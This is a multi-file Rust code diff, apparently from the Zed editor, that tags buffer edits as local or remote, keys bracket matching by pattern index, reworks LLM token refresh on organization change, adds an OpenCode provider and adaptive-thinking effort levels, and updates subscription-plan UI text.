@@ -3159,7 +3185,7 @@ impl Buffer {
self.send_operation(Operation::Buffer(operation), true, cx);
}
if undone {
- self.did_edit(&old_version, was_dirty, cx)
+ self.did_edit(&old_version, was_dirty, true, cx)
}
undone
}
@@ -3169,7 +3195,7 @@ impl Buffer {
let operation = self.text.undo_operations(counts);
let old_version = self.version.clone();
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
}
/// Manually redoes a specific transaction in the buffer's redo history.
@@ -3179,7 +3205,7 @@ impl Buffer {
if let Some((transaction_id, operation)) = self.text.redo() {
self.send_operation(Operation::Buffer(operation), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
self.restore_encoding_for_transaction(transaction_id, was_dirty);
Some(transaction_id)
} else {
@@ -3220,7 +3246,7 @@ impl Buffer {
self.send_operation(Operation::Buffer(operation), true, cx);
}
if redone {
- self.did_edit(&old_version, was_dirty, cx)
+ self.did_edit(&old_version, was_dirty, true, cx)
}
redone
}
@@ -3330,7 +3356,7 @@ impl Buffer {
if !ops.is_empty() {
for op in ops {
self.send_operation(Operation::Buffer(op), true, cx);
- self.did_edit(&old_version, was_dirty, cx);
+ self.did_edit(&old_version, was_dirty, true, cx);
}
}
}
@@ -4584,7 +4610,7 @@ impl BufferSnapshot {
continue;
}
- let mut all_brackets: Vec<(BracketMatch<usize>, bool)> = Vec::new();
+ let mut all_brackets: Vec<(BracketMatch<usize>, usize, bool)> = Vec::new();
let mut opens = Vec::new();
let mut color_pairs = Vec::new();
@@ -4610,8 +4636,9 @@ impl BufferSnapshot {
let mut open = None;
let mut close = None;
let syntax_layer_depth = mat.depth;
+ let pattern_index = mat.pattern_index;
let config = configs[mat.grammar_index];
- let pattern = &config.patterns[mat.pattern_index];
+ let pattern = &config.patterns[pattern_index];
for capture in mat.captures {
if capture.index == config.open_capture_ix {
open = Some(capture.node.byte_range());
@@ -4632,7 +4659,7 @@ impl BufferSnapshot {
}
open_to_close_ranges
- .entry((open_range.start, open_range.end))
+ .entry((open_range.start, open_range.end, pattern_index))
.or_insert_with(BTreeMap::new)
.insert(
(close_range.start, close_range.end),
@@ -4653,6 +4680,7 @@ impl BufferSnapshot {
newline_only: pattern.newline_only,
color_index: None,
},
+ pattern_index,
pattern.rainbow_exclude,
));
}
@@ -4666,22 +4694,43 @@ impl BufferSnapshot {
// For each close, we know the expected open_len from tree-sitter matches.
// Map each close to its expected open length (for inferring opens)
- let close_to_open_len: HashMap<(usize, usize), usize> = all_brackets
+ let close_to_open_len: HashMap<(usize, usize, usize), usize> = all_brackets
.iter()
- .map(|(m, _)| ((m.close_range.start, m.close_range.end), m.open_range.len()))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ ),
+ bracket_match.open_range.len(),
+ )
+ })
.collect();
// Collect unique opens and closes within this chunk
- let mut unique_opens: HashSet<(usize, usize)> = all_brackets
+ let mut unique_opens: HashSet<(usize, usize, usize)> = all_brackets
.iter()
- .map(|(m, _)| (m.open_range.start, m.open_range.end))
- .filter(|(start, _)| chunk_range.contains(start))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ bracket_match.open_range.start,
+ bracket_match.open_range.end,
+ *pattern_index,
+ )
+ })
+ .filter(|(start, _, _)| chunk_range.contains(start))
.collect();
- let mut unique_closes: Vec<(usize, usize)> = all_brackets
+ let mut unique_closes: Vec<(usize, usize, usize)> = all_brackets
.iter()
- .map(|(m, _)| (m.close_range.start, m.close_range.end))
- .filter(|(start, _)| chunk_range.contains(start))
+ .map(|(bracket_match, pattern_index, _)| {
+ (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ )
+ })
+ .filter(|(start, _, _)| chunk_range.contains(start))
.collect();
unique_closes.sort();
unique_closes.dedup();
@@ -4690,8 +4739,9 @@ impl BufferSnapshot {
let mut unique_opens_vec: Vec<_> = unique_opens.iter().copied().collect();
unique_opens_vec.sort();
- let mut valid_pairs: HashSet<((usize, usize), (usize, usize))> = HashSet::default();
- let mut open_stack: Vec<(usize, usize)> = Vec::new();
+ let mut valid_pairs: HashSet<((usize, usize, usize), (usize, usize, usize))> =
+ HashSet::default();
+ let mut open_stacks: HashMap<usize, Vec<(usize, usize)>> = HashMap::default();
let mut open_idx = 0;
for close in &unique_closes {
@@ -4699,36 +4749,53 @@ impl BufferSnapshot {
while open_idx < unique_opens_vec.len()
&& unique_opens_vec[open_idx].0 < close.0
{
- open_stack.push(unique_opens_vec[open_idx]);
+ let (start, end, pattern_index) = unique_opens_vec[open_idx];
+ open_stacks
+ .entry(pattern_index)
+ .or_default()
+ .push((start, end));
open_idx += 1;
}
// Try to match with most recent open
- if let Some(open) = open_stack.pop() {
- valid_pairs.insert((open, *close));
+ let (close_start, close_end, pattern_index) = *close;
+ if let Some(open) = open_stacks
+ .get_mut(&pattern_index)
+ .and_then(|open_stack| open_stack.pop())
+ {
+ valid_pairs.insert(((open.0, open.1, pattern_index), *close));
} else if let Some(&open_len) = close_to_open_len.get(close) {
// No open on stack - infer one based on expected open_len
- if close.0 >= open_len {
- let inferred = (close.0 - open_len, close.0);
+ if close_start >= open_len {
+ let inferred = (close_start - open_len, close_start, pattern_index);
unique_opens.insert(inferred);
valid_pairs.insert((inferred, *close));
all_brackets.push((
BracketMatch {
open_range: inferred.0..inferred.1,
- close_range: close.0..close.1,
+ close_range: close_start..close_end,
newline_only: false,
syntax_layer_depth: 0,
color_index: None,
},
+ pattern_index,
false,
));
}
}
}
- all_brackets.retain(|(m, _)| {
- let open = (m.open_range.start, m.open_range.end);
- let close = (m.close_range.start, m.close_range.end);
+ all_brackets.retain(|(bracket_match, pattern_index, _)| {
+ let open = (
+ bracket_match.open_range.start,
+ bracket_match.open_range.end,
+ *pattern_index,
+ );
+ let close = (
+ bracket_match.close_range.start,
+ bracket_match.close_range.end,
+ *pattern_index,
+ );
valid_pairs.contains(&(open, close))
});
}
@@ -4736,7 +4803,7 @@ impl BufferSnapshot {
let mut all_brackets = all_brackets
.into_iter()
.enumerate()
- .map(|(index, (bracket_match, rainbow_exclude))| {
+ .map(|(index, (bracket_match, _, rainbow_exclude))| {
// Certain languages have "brackets" that are not brackets, e.g. tags. and such
// bracket will match the entire tag with all text inside.
// For now, avoid highlighting any pair that has more than single char in each bracket.
@@ -458,15 +458,18 @@ fn test_edit_events(cx: &mut gpui::App) {
assert_eq!(
mem::take(&mut *buffer_1_events.lock()),
vec![
- BufferEvent::Edited,
+ BufferEvent::Edited { is_local: true },
BufferEvent::DirtyChanged,
- BufferEvent::Edited,
- BufferEvent::Edited,
+ BufferEvent::Edited { is_local: true },
+ BufferEvent::Edited { is_local: true },
]
);
assert_eq!(
mem::take(&mut *buffer_2_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged]
+ vec![
+ BufferEvent::Edited { is_local: false },
+ BufferEvent::DirtyChanged
+ ]
);
buffer1.update(cx, |buffer, cx| {
@@ -481,11 +484,17 @@ fn test_edit_events(cx: &mut gpui::App) {
});
assert_eq!(
mem::take(&mut *buffer_1_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged,]
+ vec![
+ BufferEvent::Edited { is_local: true },
+ BufferEvent::DirtyChanged,
+ ]
);
assert_eq!(
mem::take(&mut *buffer_2_events.lock()),
- vec![BufferEvent::Edited, BufferEvent::DirtyChanged]
+ vec![
+ BufferEvent::Edited { is_local: false },
+ BufferEvent::DirtyChanged
+ ]
);
}
@@ -30,6 +30,13 @@ impl fmt::Display for PaymentRequiredError {
pub struct LlmApiToken(Arc<RwLock<Option<String>>>);
impl LlmApiToken {
+ pub fn global(cx: &App) -> Self {
+ RefreshLlmTokenListener::global(cx)
+ .read(cx)
+ .llm_api_token
+ .clone()
+ }
+
pub async fn acquire(
&self,
client: &Arc<Client>,
@@ -56,6 +63,20 @@ impl LlmApiToken {
Self::fetch(self.0.write().await, client, organization_id).await
}
+ /// Clears the existing token before attempting to fetch a new one.
+ ///
+ /// Used when switching organizations so that a failed refresh doesn't
+ /// leave a token for the wrong organization.
+ pub async fn clear_and_refresh(
+ &self,
+ client: &Arc<Client>,
+ organization_id: Option<OrganizationId>,
+ ) -> Result<String> {
+ let mut lock = self.0.write().await;
+ *lock = None;
+ Self::fetch(lock, client, organization_id).await
+ }
+
async fn fetch(
mut lock: RwLockWriteGuard<'_, Option<String>>,
client: &Arc<Client>,
@@ -75,13 +96,16 @@ impl LlmApiToken {
*lock = Some(response.token.0.clone());
Ok(response.token.0)
}
- Err(err) => match err {
- ClientApiError::Unauthorized => {
- client.request_sign_out();
- Err(err).context("Failed to create LLM token")
+ Err(err) => {
+ *lock = None;
+ match err {
+ ClientApiError::Unauthorized => {
+ client.request_sign_out();
+ Err(err).context("Failed to create LLM token")
+ }
+ ClientApiError::Other(err) => Err(err),
}
- ClientApiError::Other(err) => Err(err),
- },
+ }
}
}
}
@@ -98,17 +122,25 @@ impl NeedsLlmTokenRefresh for http_client::Response<http_client::AsyncBody> {
}
}
+enum TokenRefreshMode {
+ Refresh,
+ ClearAndRefresh,
+}
+
struct GlobalRefreshLlmTokenListener(Entity<RefreshLlmTokenListener>);
impl Global for GlobalRefreshLlmTokenListener {}
-pub struct RefreshLlmTokenEvent;
+pub struct LlmTokenRefreshedEvent;
pub struct RefreshLlmTokenListener {
+ client: Arc<Client>,
+ user_store: Entity<UserStore>,
+ llm_api_token: LlmApiToken,
_subscription: Subscription,
}
-impl EventEmitter<RefreshLlmTokenEvent> for RefreshLlmTokenListener {}
+impl EventEmitter<LlmTokenRefreshedEvent> for RefreshLlmTokenListener {}
impl RefreshLlmTokenListener {
pub fn register(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut App) {
@@ -122,27 +154,56 @@ impl RefreshLlmTokenListener {
fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
client.add_message_to_client_handler({
- let this = cx.entity();
+ let this = cx.weak_entity();
move |message, cx| {
- Self::handle_refresh_llm_token(this.clone(), message, cx);
+ if let Some(this) = this.upgrade() {
+ Self::handle_refresh_llm_token(this, message, cx);
+ }
}
});
- let subscription = cx.subscribe(&user_store, |_this, _user_store, event, cx| {
+ let subscription = cx.subscribe(&user_store, |this, _user_store, event, cx| {
if matches!(event, client::user::Event::OrganizationChanged) {
- cx.emit(RefreshLlmTokenEvent);
+ this.refresh(TokenRefreshMode::ClearAndRefresh, cx);
}
});
Self {
+ client,
+ user_store,
+ llm_api_token: LlmApiToken::default(),
_subscription: subscription,
}
}
+ fn refresh(&self, mode: TokenRefreshMode, cx: &mut Context<Self>) {
+ let client = self.client.clone();
+ let llm_api_token = self.llm_api_token.clone();
+ let organization_id = self
+ .user_store
+ .read(cx)
+ .current_organization()
+ .map(|organization| organization.id.clone());
+ cx.spawn(async move |this, cx| {
+ match mode {
+ TokenRefreshMode::Refresh => {
+ llm_api_token.refresh(&client, organization_id).await?;
+ }
+ TokenRefreshMode::ClearAndRefresh => {
+ llm_api_token
+ .clear_and_refresh(&client, organization_id)
+ .await?;
+ }
+ }
+ this.update(cx, |_this, cx| cx.emit(LlmTokenRefreshedEvent))
+ })
+ .detach_and_log_err(cx);
+ }
+
fn handle_refresh_llm_token(this: Entity<Self>, message: &MessageToClient, cx: &mut App) {
match message {
MessageToClient::UserUpdated => {
- this.update(cx, |_this, cx| cx.emit(RefreshLlmTokenEvent));
+ this.update(cx, |this, cx| this.refresh(TokenRefreshMode::Refresh, cx));
}
}
}
@@ -234,7 +234,9 @@ pub struct LanguageModelToolResult {
pub tool_use_id: LanguageModelToolUseId,
pub tool_name: Arc<str>,
pub is_error: bool,
+ /// The tool output formatted for presenting to the model
pub content: LanguageModelToolResultContent,
+ /// The raw tool output, if available, often for debugging or extra state for replay
pub output: Option<serde_json::Value>,
}
@@ -20,7 +20,6 @@ aws-credential-types = { workspace = true, features = ["hardcoded-credentials"]
aws_http_client.workspace = true
base64.workspace = true
bedrock = { workspace = true, features = ["schemars"] }
-chrono.workspace = true
client.workspace = true
cloud_api_types.workspace = true
cloud_llm_client.workspace = true
@@ -48,6 +47,7 @@ menu.workspace = true
mistral = { workspace = true, features = ["schemars"] }
ollama = { workspace = true, features = ["schemars"] }
open_ai = { workspace = true, features = ["schemars"] }
+opencode = { workspace = true, features = ["schemars"] }
open_router = { workspace = true, features = ["schemars"] }
partial-json-fixer.workspace = true
release_channel.workspace = true
@@ -68,7 +68,6 @@ vercel = { workspace = true, features = ["schemars"] }
x_ai = { workspace = true, features = ["schemars"] }
[dev-dependencies]
-
language_model = { workspace = true, features = ["test-support"] }
pretty_assertions.workspace = true
@@ -24,6 +24,7 @@ use crate::provider::ollama::OllamaLanguageModelProvider;
use crate::provider::open_ai::OpenAiLanguageModelProvider;
use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider;
use crate::provider::open_router::OpenRouterLanguageModelProvider;
+use crate::provider::opencode::OpenCodeLanguageModelProvider;
use crate::provider::vercel::VercelLanguageModelProvider;
use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider;
use crate::provider::x_ai::XAiLanguageModelProvider;
@@ -38,37 +39,43 @@ pub fn init(user_store: Entity<UserStore>, client: Arc<Client>, cx: &mut App) {
// Subscribe to extension store events to track LLM extension installations
if let Some(extension_store) = extension_host::ExtensionStore::try_global(cx) {
cx.subscribe(&extension_store, {
- let registry = registry.clone();
- move |extension_store, event, cx| match event {
- extension_host::Event::ExtensionInstalled(extension_id) => {
- if let Some(manifest) = extension_store
- .read(cx)
- .extension_manifest_for_id(extension_id)
- {
- if !manifest.language_model_providers.is_empty() {
- registry.update(cx, |registry, cx| {
- registry.extension_installed(extension_id.clone(), cx);
- });
+ let registry = registry.downgrade();
+ move |extension_store, event, cx| {
+ let Some(registry) = registry.upgrade() else {
+ return;
+ };
+ match event {
+ extension_host::Event::ExtensionInstalled(extension_id) => {
+ if let Some(manifest) = extension_store
+ .read(cx)
+ .extension_manifest_for_id(extension_id)
+ {
+ if !manifest.language_model_providers.is_empty() {
+ registry.update(cx, |registry, cx| {
+ registry.extension_installed(extension_id.clone(), cx);
+ });
+ }
}
}
- }
- extension_host::Event::ExtensionUninstalled(extension_id) => {
- registry.update(cx, |registry, cx| {
- registry.extension_uninstalled(extension_id, cx);
- });
- }
- extension_host::Event::ExtensionsUpdated => {
- let mut new_ids = HashSet::default();
- for (extension_id, entry) in extension_store.read(cx).installed_extensions() {
- if !entry.manifest.language_model_providers.is_empty() {
- new_ids.insert(extension_id.clone());
+ extension_host::Event::ExtensionUninstalled(extension_id) => {
+ registry.update(cx, |registry, cx| {
+ registry.extension_uninstalled(extension_id, cx);
+ });
+ }
+ extension_host::Event::ExtensionsUpdated => {
+ let mut new_ids = HashSet::default();
+ for (extension_id, entry) in extension_store.read(cx).installed_extensions()
+ {
+ if !entry.manifest.language_model_providers.is_empty() {
+ new_ids.insert(extension_id.clone());
+ }
}
+ registry.update(cx, |registry, cx| {
+ registry.sync_installed_llm_extensions(new_ids, cx);
+ });
}
- registry.update(cx, |registry, cx| {
- registry.sync_installed_llm_extensions(new_ids, cx);
- });
+ _ => {}
}
- _ => {}
}
})
.detach();
@@ -100,7 +107,11 @@ pub fn init(user_store: Entity<UserStore>, client: Arc<Client>, cx: &mut App) {
cx,
);
});
+ let registry = registry.downgrade();
cx.observe_global::<SettingsStore>(move |cx| {
+ let Some(registry) = registry.upgrade() else {
+ return;
+ };
let openai_compatible_providers_new = AllLanguageModelSettings::get_global(cx)
.openai_compatible
.keys()
@@ -220,5 +231,9 @@ fn register_language_model_providers(
Arc::new(XAiLanguageModelProvider::new(client.http_client(), cx)),
cx,
);
+ registry.register_provider(
+ Arc::new(OpenCodeLanguageModelProvider::new(client.http_client(), cx)),
+ cx,
+ );
registry.register_provider(Arc::new(CopilotChatLanguageModelProvider::new(cx)), cx);
}
@@ -10,6 +10,7 @@ pub mod ollama;
pub mod open_ai;
pub mod open_ai_compatible;
pub mod open_router;
+pub mod opencode;
mod util;
pub mod vercel;
pub mod vercel_ai_gateway;
@@ -24,7 +24,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*};
use ui_input::InputField;
use util::ResultExt;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
pub use settings::AnthropicAvailableModel as AvailableModel;
@@ -140,13 +140,10 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider {
}
fn recommended_models(&self, _cx: &App) -> Vec<Arc<dyn LanguageModel>> {
- [
- anthropic::Model::ClaudeSonnet4_6,
- anthropic::Model::ClaudeSonnet4_6Thinking,
- ]
- .into_iter()
- .map(|model| self.create_language_model(model))
- .collect()
+ [anthropic::Model::ClaudeSonnet4_6]
+ .into_iter()
+ .map(|model| self.create_language_model(model))
+ .collect()
}
fn provided_models(&self, cx: &App) -> Vec<Arc<dyn LanguageModel>> {
@@ -178,7 +175,12 @@ impl LanguageModelProvider for AnthropicLanguageModelProvider {
max_output_tokens: model.max_output_tokens,
default_temperature: model.default_temperature,
extra_beta_headers: model.extra_beta_headers.clone(),
- mode: model.mode.unwrap_or_default().into(),
+ mode: match model.mode.unwrap_or_default() {
+ settings::ModelMode::Default => AnthropicModelMode::Default,
+ settings::ModelMode::Thinking { budget_tokens } => {
+ AnthropicModelMode::Thinking { budget_tokens }
+ }
+ },
},
);
}
@@ -356,10 +358,14 @@ pub fn into_anthropic_count_tokens_request(
} else {
Some(anthropic::StringOrContents::String(system_message))
},
- thinking: if request.thinking_allowed
- && let AnthropicModelMode::Thinking { budget_tokens } = mode
- {
- Some(anthropic::Thinking::Enabled { budget_tokens })
+ thinking: if request.thinking_allowed {
+ match mode {
+ AnthropicModelMode::Thinking { budget_tokens } => {
+ Some(anthropic::Thinking::Enabled { budget_tokens })
+ }
+ AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive),
+ AnthropicModelMode::Default => None,
+ }
} else {
None
},
@@ -517,7 +523,36 @@ impl LanguageModel for AnthropicModel {
}
fn supports_thinking(&self) -> bool {
- matches!(self.model.mode(), AnthropicModelMode::Thinking { .. })
+ self.model.supports_thinking()
+ }
+
+ fn supported_effort_levels(&self) -> Vec<language_model::LanguageModelEffortLevel> {
+ if self.model.supports_adaptive_thinking() {
+ vec![
+ language_model::LanguageModelEffortLevel {
+ name: "Low".into(),
+ value: "low".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Medium".into(),
+ value: "medium".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "High".into(),
+ value: "high".into(),
+ is_default: true,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Max".into(),
+ value: "max".into(),
+ is_default: false,
+ },
+ ]
+ } else {
+ Vec::new()
+ }
}
fn telemetry_id(&self) -> String {
@@ -700,10 +735,14 @@ pub fn into_anthropic(
} else {
Some(anthropic::StringOrContents::String(system_message))
},
- thinking: if request.thinking_allowed
- && let AnthropicModelMode::Thinking { budget_tokens } = mode
- {
- Some(anthropic::Thinking::Enabled { budget_tokens })
+ thinking: if request.thinking_allowed {
+ match mode {
+ AnthropicModelMode::Thinking { budget_tokens } => {
+ Some(anthropic::Thinking::Enabled { budget_tokens })
+ }
+ AnthropicModelMode::AdaptiveThinking => Some(anthropic::Thinking::Adaptive),
+ AnthropicModelMode::Default => None,
+ }
} else {
None
},
@@ -723,7 +762,24 @@ pub fn into_anthropic(
LanguageModelToolChoice::None => anthropic::ToolChoice::None,
}),
metadata: None,
- output_config: None,
+ output_config: if request.thinking_allowed
+ && matches!(mode, AnthropicModelMode::AdaptiveThinking)
+ {
+ request.thinking_effort.as_deref().and_then(|effort| {
+ let effort = match effort {
+ "low" => Some(anthropic::Effort::Low),
+ "medium" => Some(anthropic::Effort::Medium),
+ "high" => Some(anthropic::Effort::High),
+ "max" => Some(anthropic::Effort::Max),
+ _ => None,
+ };
+ effort.map(|effort| anthropic::OutputConfig {
+ effort: Some(effort),
+ })
+ })
+ } else {
+ None
+ },
stop_sequences: Vec::new(),
speed: request.speed.map(From::from),
temperature: request.temperature.or(Some(default_temperature)),
@@ -817,9 +873,9 @@ impl AnthropicEventMapper {
// valid JSON that serde can accept, e.g. by closing
// unclosed delimiters. This way, we can update the
// UI with whatever has been streamed back so far.
- if let Ok(input) = serde_json::Value::from_str(
- &partial_json_fixer::fix_json(&tool_use.input_json),
- ) {
+ if let Ok(input) =
+ serde_json::Value::from_str(&fix_streamed_json(&tool_use.input_json))
+ {
return vec![Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
id: tool_use.id.clone().into(),
@@ -48,7 +48,7 @@ use ui_input::InputField;
use util::ResultExt;
use crate::AllLanguageModelSettings;
-use crate::provider::util::parse_tool_arguments;
+use crate::provider::util::{fix_streamed_json, parse_tool_arguments};
actions!(bedrock, [Tab, TabPrev]);
@@ -642,10 +642,36 @@ impl LanguageModel for BedrockModel {
}
fn supports_thinking(&self) -> bool {
- matches!(
- self.model.mode(),
- BedrockModelMode::Thinking { .. } | BedrockModelMode::AdaptiveThinking { .. }
- )
+ self.model.supports_thinking()
+ }
+
+ fn supported_effort_levels(&self) -> Vec<language_model::LanguageModelEffortLevel> {
+ if self.model.supports_adaptive_thinking() {
+ vec![
+ language_model::LanguageModelEffortLevel {
+ name: "Low".into(),
+ value: "low".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Medium".into(),
+ value: "medium".into(),
+ is_default: false,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "High".into(),
+ value: "high".into(),
+ is_default: true,
+ },
+ language_model::LanguageModelEffortLevel {
+ name: "Max".into(),
+ value: "max".into(),
+ is_default: false,
+ },
+ ]
+ } else {
+ Vec::new()
+ }
}
fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool {
@@ -718,7 +744,7 @@ impl LanguageModel for BedrockModel {
model_id,
self.model.default_temperature(),
self.model.max_output_tokens(),
- self.model.mode(),
+ self.model.thinking_mode(),
self.model.supports_caching(),
self.model.supports_tool_use(),
use_extended_context,
@@ -811,7 +837,7 @@ pub fn into_bedrock(
model: String,
default_temperature: f32,
max_output_tokens: u64,
- mode: BedrockModelMode,
+ thinking_mode: BedrockModelMode,
supports_caching: bool,
supports_tool_use: bool,
allow_extended_context: bool,
@@ -1085,11 +1111,24 @@ pub fn into_bedrock(
system: Some(system_message),
tools: tool_config,
thinking: if request.thinking_allowed {
- match mode {
+ match thinking_mode {
BedrockModelMode::Thinking { budget_tokens } => {
Some(bedrock::Thinking::Enabled { budget_tokens })
}
- BedrockModelMode::AdaptiveThinking { effort } => {
+ BedrockModelMode::AdaptiveThinking {
+ effort: default_effort,
+ } => {
+ let effort = request
+ .thinking_effort
+ .as_deref()
+ .and_then(|e| match e {
+ "low" => Some(bedrock::BedrockAdaptiveThinkingEffort::Low),
+ "medium" => Some(bedrock::BedrockAdaptiveThinkingEffort::Medium),
+ "high" => Some(bedrock::BedrockAdaptiveThinkingEffort::High),
+ "max" => Some(bedrock::BedrockAdaptiveThinkingEffort::Max),
+ _ => None,
+ })
+ .unwrap_or(default_effort);
Some(bedrock::Thinking::Adaptive { effort })
}
BedrockModelMode::Default => None,
@@ -1205,7 +1244,7 @@ pub fn map_to_language_model_completion_events(
{
tool_use.input_json.push_str(tool_output.input());
if let Ok(input) = serde_json::from_str::<serde_json::Value>(
- &partial_json_fixer::fix_json(&tool_use.input_json),
+ &fix_streamed_json(&tool_use.input_json),
) {
Some(Ok(LanguageModelCompletionEvent::ToolUse(
LanguageModelToolUse {
@@ -1574,7 +1613,8 @@ impl Render for ConfigurationView {
}
v_flex()
- .size_full()
+ .min_w_0()
+ .w_full()
.track_focus(&self.focus_handle)
.on_action(cx.listener(Self::on_tab))
.on_action(cx.listener(Self::on_tab_prev))
@@ -1,7 +1,6 @@
use ai_onboarding::YoungAccountBanner;
use anthropic::AnthropicModelMode;
use anyhow::{Context as _, Result, anyhow};
-use chrono::{DateTime, Utc};
use client::{Client, UserStore, zed_urls};
use cloud_api_types::{OrganizationId, Plan};
use cloud_llm_client::{
@@ -109,9 +108,10 @@ impl State {
cx: &mut Context<Self>,
) -> Self {
let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
+ let llm_api_token = LlmApiToken::global(cx);
Self {
client: client.clone(),
- llm_api_token: LlmApiToken::default(),
+ llm_api_token,
user_store: user_store.clone(),
status,
models: Vec::new(),
@@ -156,11 +156,8 @@ impl State {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
cx.spawn(async move |this, cx| {
- llm_api_token
- .refresh(&client, organization_id.clone())
- .await?;
let response =
Self::fetch_models(client, llm_api_token, organization_id).await?;
this.update(cx, |this, cx| {
@@ -634,7 +631,7 @@ impl LanguageModel for CloudLanguageModel {
fn supports_split_token_display(&self) -> bool {
use cloud_llm_client::LanguageModelProvider::*;
- matches!(self.model.provider, OpenAi)
+ matches!(self.model.provider, OpenAi | XAi)
}
fn telemetry_id(&self) -> String {
@@ -644,11 +641,11 @@ impl LanguageModel for CloudLanguageModel {
fn tool_input_format(&self) -> LanguageModelToolSchemaFormat {
match self.model.provider {
cloud_llm_client::LanguageModelProvider::Anthropic
- | cloud_llm_client::LanguageModelProvider::OpenAi
- | cloud_llm_client::LanguageModelProvider::XAi => {
+ | cloud_llm_client::LanguageModelProvider::OpenAi => {
LanguageModelToolSchemaFormat::JsonSchema
}
- cloud_llm_client::LanguageModelProvider::Google => {
+ cloud_llm_client::LanguageModelProvider::Google
+ | cloud_llm_client::LanguageModelProvider::XAi => {
LanguageModelToolSchemaFormat::JsonSchemaSubset
}
}
@@ -707,7 +704,7 @@ impl LanguageModel for CloudLanguageModel {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
let model_id = self.model.id.to_string();
let generate_content_request =
into_google(request, model_id.clone(), GoogleModelMode::Default);
@@ -779,7 +776,7 @@ impl LanguageModel for CloudLanguageModel {
user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone())
+ .map(|organization| organization.id.clone())
});
let thinking_allowed = request.thinking_allowed;
let enable_thinking = thinking_allowed && self.model.supports_thinking;
@@ -1093,7 +1090,6 @@ fn response_lines<T: DeserializeOwned>(
struct ZedAiConfiguration {
is_connected: bool,
plan: Option<Plan>,
- subscription_period: Option<(DateTime<Utc>, DateTime<Utc>)>,
eligible_for_trial: bool,
account_too_young: bool,
sign_in_callback: Arc<dyn Fn(&mut Window, &mut App) + Send + Sync>,
@@ -1101,33 +1097,37 @@ struct ZedAiConfiguration {
impl RenderOnce for ZedAiConfiguration {
fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
- let is_pro = self.plan.is_some_and(|plan| plan == Plan::ZedPro);
- let subscription_text = match (self.plan, self.subscription_period) {
- (Some(Plan::ZedPro), Some(_)) => {
- "You have access to Zed's hosted models through your Pro subscription."
- }
- (Some(Plan::ZedProTrial), Some(_)) => {
- "You have access to Zed's hosted models through your Pro trial."
- }
- (Some(Plan::ZedFree), Some(_)) => {
- if self.eligible_for_trial {
- "Subscribe for access to Zed's hosted models. Start with a 14 day free trial."
- } else {
- "Subscribe for access to Zed's hosted models."
- }
- }
- _ => {
+ let (subscription_text, has_paid_plan) = match self.plan {
+ Some(Plan::ZedPro) => (
+ "You have access to Zed's hosted models through your Pro subscription.",
+ true,
+ ),
+ Some(Plan::ZedProTrial) => (
+ "You have access to Zed's hosted models through your Pro trial.",
+ false,
+ ),
+ Some(Plan::ZedStudent) => (
+ "You have access to Zed's hosted models through your Student subscription.",
+ true,
+ ),
+ Some(Plan::ZedBusiness) => (
+ "You have access to Zed's hosted models through your Organization.",
+ true,
+ ),
+ Some(Plan::ZedFree) | None => (
if self.eligible_for_trial {
"Subscribe for access to Zed's hosted models. Start with a 14 day free trial."
} else {
"Subscribe for access to Zed's hosted models."
- }
- }
+ },
+ false,
+ ),
};
- let manage_subscription_buttons = if is_pro {
+ let manage_subscription_buttons = if has_paid_plan {
Button::new("manage_settings", "Manage Subscription")
.full_width()
+ .label_size(LabelSize::Small)
.style(ButtonStyle::Tinted(TintColor::Accent))
.on_click(|_, _, cx| cx.open_url(&zed_urls::account_url(cx)))
.into_any_element()
@@ -1151,10 +1151,7 @@ impl RenderOnce for ZedAiConfiguration {
.child(Label::new("Sign in to have access to Zed's complete agentic experience with hosted models."))
.child(
Button::new("sign_in", "Sign In to use Zed AI")
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).size(IconSize::Small).color(Color::Muted))
.full_width()
.on_click({
let callback = self.sign_in_callback.clone();
@@ -1211,7 +1208,6 @@ impl Render for ConfigurationView {
ZedAiConfiguration {
is_connected: !state.is_signed_out(cx),
plan: user_store.plan(),
- subscription_period: user_store.subscription_period(),
eligible_for_trial: user_store.trial_started_at().is_none(),
account_too_young: user_store.account_too_young(),
sign_in_callback: self.sign_in_callback.clone(),
@@ -1242,9 +1238,6 @@ impl Component for ZedAiConfiguration {
ZedAiConfiguration {
is_connected,
plan,
- subscription_period: plan
- .is_some()
- .then(|| (Utc::now(), Utc::now() + chrono::Duration::days(7))),
eligible_for_trial,
account_too_young,
sign_in_callback: Arc::new(|_, _| {}),
@@ -33,7 +33,7 @@ use ui::prelude::*;
use util::debug_panic;
use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic};
